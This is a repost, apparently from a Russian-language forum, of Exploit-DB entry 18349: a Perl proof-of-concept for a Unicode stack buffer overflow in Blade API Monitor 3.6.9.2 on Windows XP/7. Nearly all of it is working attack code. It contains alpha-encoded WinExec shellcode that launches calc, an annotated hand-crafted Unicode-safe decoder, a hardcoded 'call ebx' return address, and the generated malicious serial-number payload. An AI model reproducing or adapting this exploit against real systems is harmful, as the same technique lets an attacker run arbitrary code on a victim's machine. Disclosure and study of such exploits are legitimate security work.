- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18349
- Проверка EDB
-
- Пройдено
- Автор
- FULLMETALFOUAD
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2012-01-10
Код:
# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
my $file= "bof_blade.txt";
# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";
#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP
my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;
my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";
# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|
# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|
# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|
# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|
$finder = $part0.$part1.$part2.$part3;
open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";
# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC- Источник
- www.exploit-db.com
